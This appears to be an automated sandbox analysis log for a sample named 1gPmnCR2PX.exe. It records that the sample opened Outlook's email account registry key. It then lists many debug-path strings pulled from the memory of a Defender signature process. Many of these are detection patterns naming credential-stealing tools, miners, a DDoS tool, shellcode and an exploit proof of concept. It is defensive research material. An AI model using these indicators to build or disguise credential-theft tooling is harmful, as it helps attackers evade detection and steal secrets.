Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Mutant created: \Sessions\1\BaseNamedObjects\sX3-pR8-aK2-pH9-l$O2$e
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \src\x64\Release\wajam_64.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 0000000B.00000003.18306579283.0000021B5E6D2000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: 6E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb~ source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RegCleaner\bin\Release\PCCleaningUtility.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: MpAdlElvtStub.pdb source: mpam-728dfe11.exe, 00000011.00000002.19890272832.00007FF74001F000.00000002.00020000.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: irprops.pdbj source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: ConfigSecurityPolicy.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18590234890.0000027770036000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PicoTorrent.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \AppSync.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \Minoral.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: msiexec.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdb source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: MpUxAgent.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18586235407.0000027770034000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: dsget.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-registry-l1-1-0.pdbM8 source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: enumst\release\enumst.pdb] source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: (setup\odbcconf\exe\obj\i386\odbcconf.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: ZohoTray.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: .+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp
Source: Binary string: version.pdb@SH source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: release\wrapperex.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: ?\UltraCam\Src\UltraMap\AtTool\AtTool\obj\x64\Release\AtTool.pdba^ source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: PCHunter64.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb0 source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp
Source: Binary string: -\CVE-2019-0803201992\x64\Release\poc_test.pdba source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
